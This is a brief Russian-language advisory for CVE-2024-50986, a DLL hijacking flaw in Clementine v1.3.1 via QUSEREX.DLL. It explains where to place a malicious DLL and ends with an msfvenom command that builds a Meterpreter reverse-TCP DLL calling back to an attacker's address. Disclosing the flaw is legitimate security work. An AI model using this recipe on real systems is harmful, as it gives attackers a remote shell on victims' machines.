
Проблема в Clementine v.1.3.1 позволяет локальному злоумышленнику выполнить произвольный код с помощью специально созданного DLL-файла (DLL Hijacking)
Описание: Проблема в Clementine v.1.3.1 позволяет локальному злоумышленнику выполнить произвольный код с помощью специально созданного DLL-файла.
Затронутая версия: Clementine v.1.3.1
Исследователь: Utkarsh (r1971d3) LinkedIn
Ссылка на CVE NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-50986
Тип уязвимости: Недоверенный путь поиска
Затронутый компонент: QUSEREX.DLL
Чтобы использовать эту уязвимость, атакующий должен создать вредоносный DLL-файл с именем QUSEREX.DLL и разместить его в каталоге: C:\Users<username>\AppData\Local\Microsoft\WindowsApps. При запуске приложения Clementine оно загрузит этот вредоносный DLL-файл, выполнив код атакующего.


sudo msfvenom -p windows/meterpreter/reverse_tcp -ax86 -f dll LHOST=<IP Address> LPORT=<Port> > QUSEREX.DLL



